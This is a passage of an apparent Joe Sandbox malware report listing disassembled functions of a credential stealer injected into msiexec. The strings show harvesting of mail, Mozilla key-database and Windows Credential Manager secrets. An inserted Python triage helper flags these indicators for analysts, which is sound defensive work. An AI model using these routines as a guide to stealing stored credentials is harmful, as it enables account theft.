                                                                                                          • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                          • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                                                        • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                                        • API String ID: 524865279-2190619648
                                                                                                        • Opcode ID: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                                                                        • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                                                                        • Opcode Fuzzy Hash: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                                                                        • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                                        • String ID: 0$6
                                                                                                        • API String ID: 2300387033-3849865405
                                                                                                        • Opcode ID: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                                                                        • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                                                                        • Opcode Fuzzy Hash: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                                                                        • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 004076D7
                                                                                                        • sprintf.MSVCRT ref: 00407704
                                                                                                        • strlen.MSVCRT ref: 00407710
                                                                                                        • memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                        • strlen.MSVCRT ref: 00407733
                                                                                                        • memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpystrlen$memsetsprintf
                                                                                                        • String ID: %s (%s)
                                                                                                        • API String ID: 3756086014-1363028141
                                                                                                        • Opcode ID: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                                                                                        • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                                                                                                        • Opcode Fuzzy Hash: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                                                                                        • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                                                                                                        APIs
                                                                                                        • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                        • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                        • memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                                        • CoTaskMemFree.COMBASE(?), ref: 004108D2
                                                                                                        Strings
                                                                                                        • 00000000-0000-0000-0000-000000000000, xrefs: 00410882
                                                                                                        • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 00410875
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                        • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                                                                        • API String ID: 1640410171-3316789007
                                                                                                        • Opcode ID: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                                                                                                        • Instruction ID: 2d05171d55a2aa7530ad5e51965ca7b7e6a6868cf32f938cfe5ee3e9f977ce1c
                                                                                                        • Opcode Fuzzy Hash: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                                                                                                        • Instruction Fuzzy Hash: BD016D7690412DBADF01AE95CD40EEB7BACEF49354F044123FD15E6150E6B8EA84CBE4
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _mbscat$memsetsprintf
                                                                                                        • String ID: %2.2X
                                                                                                        • API String ID: 125969286-791839006
                                                                                                        • Opcode ID: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                                                                        • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                                                                        • Opcode Fuzzy Hash: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                                                                        • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                                                                        APIs
                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
                                                                                                        • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                                                          • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                                                          • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                                                          • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                                          • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                          • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                                                          • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                          • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                                                                                        • CloseHandle.KERNEL32(?), ref: 00444206
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$??2@??3@$ByteCharCloseHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                                        • String ID: ACD
                                                                                                        • API String ID: 82305771-620537770
                                                                                                        • Opcode ID: c50c8069a9a8a0753d3fcb8904f6dc24e57909486b41191e56791defa24a5ab0
                                                                                                        • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                                                                        • Opcode Fuzzy Hash: c50c8069a9a8a0753d3fcb8904f6dc24e57909486b41191e56791defa24a5ab0
                                                                                                        • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 004091EC
                                                                                                        • sprintf.MSVCRT ref: 00409201
                                                                                                          • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                                                          • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                          • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                                        • SetWindowTextA.USER32(?,?), ref: 00409228
                                                                                                        • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                                                        • String ID: caption$dialog_%d
                                                                                                        • API String ID: 2923679083-4161923789
                                                                                                        • Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                                                                        • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                                                                        • Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                                                                        • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                                                                        APIs
                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                                                                                                        • memset.MSVCRT ref: 00410246
                                                                                                        • memset.MSVCRT ref: 00410258
                                                                                                          • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                        • memset.MSVCRT ref: 0041033F
                                                                                                        • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                                                                                        • CloseHandle.KERNEL32(?,0040FE66,?), ref: 004103AE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 3974772901-0
                                                                                                        • Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                                                        • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                                                                        • Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                                                        • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                                                                        APIs
                                                                                                        • wcslen.MSVCRT ref: 0044406C
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                          • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                                          • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                                          • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                                          • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                                          • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                                        • strlen.MSVCRT ref: 004440D1
                                                                                                          • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                                                                          • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
                                                                                                        • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                                        • String ID:
                                                                                                        • API String ID: 577244452-0
                                                                                                        • Opcode ID: 577707887b9d7bbd390cae1504d1f2340da0442234304708d55a86593fe8f1d4
                                                                                                        • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                                                                        • Opcode Fuzzy Hash: 577707887b9d7bbd390cae1504d1f2340da0442234304708d55a86593fe8f1d4
                                                                                                        • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                                                                        APIs
                                                                                                          • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                          • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                        • _strcmpi.MSVCRT ref: 00404518
                                                                                                        • _strcmpi.MSVCRT ref: 00404536
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _strcmpi$memcpystrlen
                                                                                                        • String ID: imap$pop3$smtp
                                                                                                        • API String ID: 2025310588-821077329
                                                                                                        • Opcode ID: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                                                        • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                                                                        • Opcode Fuzzy Hash: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                                                        • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 0040C02D
                                                                                                          • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                          • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                                          • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                                          • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                          • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                                                          • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                                                          • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                                                          • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                          • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                                                          • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                          • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                                        • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                        • API String ID: 2726666094-3614832568
                                                                                                        • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                                                        • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                                                                        • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                                                        • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                                                                        APIs
                                                                                                        • memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
                                                                                                          • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
                                                                                                          • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                                                                          • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                                                                        • memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
                                                                                                        • memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
                                                                                                        • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcmp$memcpy
                                                                                                        • String ID: global-salt$password-check
                                                                                                        • API String ID: 231171946-3927197501
                                                                                                        • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                        • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                                                                        • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                        • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
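The function listings on this page (per dumped function: API calls with their resolved arguments, the string IDs, and the opcode/instruction hashes) are what an analyst greps through to confirm which routines in the msiexec dump do the credential harvesting. The following Python helper is an added example and is not part of the Joe Sandbox report or its tooling: it parses blocks in the format shown here into records and flags the ones whose string and API mix is worth a closer look, namely the "global-salt"/"password-check" pair (the record names used in Mozilla NSS key3.db), the imap/pop3/smtp strings, the Cred* export names resolved from advapi32.dll, and OpenProcess calls whose access mask includes PROCESS_VM_READ (bit 0x10 of the 0x410 mask seen above). The line shapes it assumes are those visible on this page; the sample input is excerpted from the entries above with the report's own values, and the tag names are this example's, not the report's.

```python
"""Parse Joe Sandbox 'IDA Plugin' function listings and flag credential-harvesting hints.

Added triage helper, not part of the Joe Sandbox report or its tooling.
Assumed line shapes (as seen in the report):
  '• name.MODULE(args), ref: 0040XXXX'      or  '• name.MODULE ref: 0040XXXX'
  '• Part of subcall function 0040XXXX: name.MODULE(...), ref: 0040XXXX'
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# Windows process access rights (winnt.h) relevant to reading another process's memory.
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400

REF_RE = re.compile(r",?\s*ref:\s*([0-9A-Fa-f]{8})\s*$")
SUBCALL_RE = re.compile(r"^Part of subcall function ([0-9A-Fa-f]{8}):\s*(.*)$")
CALL_RE = re.compile(r"^(.+?)\.([A-Z0-9]+)(?:\((.*)\))?$")  # name.MODULE(args)


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: str
    subcall_of: Optional[str] = None  # parent function address when listed as a subcall


@dataclass
class FunctionEntry:
    calls: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    opcode_id: Optional[str] = None
    instruction_id: Optional[str] = None

    def all_args(self):
        return [a for c in self.calls for a in c.args]


def parse_api_line(text):
    """Turn one API line into an ApiCall, or None if the line is not one."""
    m = REF_RE.search(text)
    if not m:
        return None
    ref, body = m.group(1).upper(), text[: m.start()].strip()
    parent = None
    sm = SUBCALL_RE.match(body)
    if sm:
        parent, body = sm.group(1).upper(), sm.group(2).strip()
    cm = CALL_RE.match(body)
    if not cm:
        return None
    name, module, args = cm.group(1), cm.group(2), cm.group(3)
    arg_list = [a.strip() for a in args.split(",")] if args else []
    return ApiCall(name, module, arg_list, ref, parent)


def parse_listing(text):
    """Split a listing into FunctionEntry records, one per 'APIs' block."""
    entries, current = [], None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        if line == "APIs":
            current = FunctionEntry()
            entries.append(current)
        elif current is None:
            continue
        elif line.startswith("String ID:"):
            current.strings = [s for s in line.split(":", 1)[1].strip().split("$") if s]
        elif line.startswith("Opcode ID:"):
            current.opcode_id = line.split(":", 1)[1].strip()
        elif line.startswith("Instruction ID:"):
            current.instruction_id = line.split(":", 1)[1].strip()
        else:
            call = parse_api_line(line)
            if call:
                current.calls.append(call)
    return entries


def triage(entry):
    """Return the set of (example-defined) indicator tags present in one entry."""
    tags, strings = set(), {s.lower() for s in entry.strings}
    if {"global-salt", "password-check"} <= strings:
        tags.add("mozilla-keydb-parsing")        # NSS key3.db record names
    if strings & {"imap", "pop3", "smtp"}:
        tags.add("mail-client-config")
    if {"CredReadA", "CredEnumerateA", "CredDeleteA"} & set(entry.all_args()):
        tags.add("windows-credential-manager")   # resolved from advapi32.dll via GetProcAddress
    for c in entry.calls:
        if c.name == "OpenProcess" and c.args and re.fullmatch(r"[0-9A-Fa-f]{8}", c.args[0]):
            if int(c.args[0], 16) & PROCESS_VM_READ:
                tags.add("opens-process-with-vm-read")
    return tags


# Sample input: lines excerpted from the report entries above (values are the report's own).
SAMPLE = """\
APIs
• OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
• memset.MSVCRT ref: 00410246
• _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
• CloseHandle.KERNEL32(?,0040FE66,?), ref: 004103AE
• String ID:
• Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
APIs
  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
• _strcmpi.MSVCRT ref: 00404518
• _strcmpi.MSVCRT ref: 00404536
• String ID: imap$pop3$smtp
• Opcode ID: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
APIs
• memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
• memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
• memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
• String ID: global-salt$password-check
• Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
APIs
  • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
"""


def flagged(text):
    """Return [(opcode_id or first call ref, sorted tags)] for entries with any tag."""
    out = []
    for e in parse_listing(text):
        tags = triage(e)
        if tags:
            out.append((e.opcode_id or e.calls[0].ref, sorted(tags)))
    return out


if __name__ == "__main__":
    for ident, tags in flagged(SAMPLE):
        print(ident[:16], ", ".join(tags))
```

Run it against the text of the whole report (after stripping the page indentation, which `parse_listing` does per line) to get a short list of function hashes to pivot on; the opcode ID is stable across dumps of the same build, so a hit on, say, the `global-salt`/`password-check` routine can be matched against other Remcos dumps without re-reading the listing.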
                                                                                                        APIs
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??3@
                                                                                                        • String ID:
                                                                                                        • API String ID: 613200358-0
                                                                                                        • Opcode ID: be2380aa8a20d610938c9a348f674ad3e0c214076fbfa607157327dc7182db63
                                                                                                        • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                                                                        • Opcode Fuzzy Hash: be2380aa8a20d610938c9a348f674ad3e0c214076fbfa607157327dc7182db63
                                                                                                        • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                                                                        APIs
                                                                                                        • GetClientRect.USER32(?,?), ref: 004016A3
                                                                                                        • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                                                                                        • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                                                                                        • BeginPaint.USER32(?,?), ref: 004016D7
                                                                                                        • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                                                                                        • EndPaint.USER32(?,?), ref: 004016F3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                        • String ID:
                                                                                                        • API String ID: 19018683-0
                                                                                                        • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                        • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                                                                                                        • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                        • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 0040644F
                                                                                                        • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                        • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                          • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                                                          • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                                                          • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                                                          • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                          • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
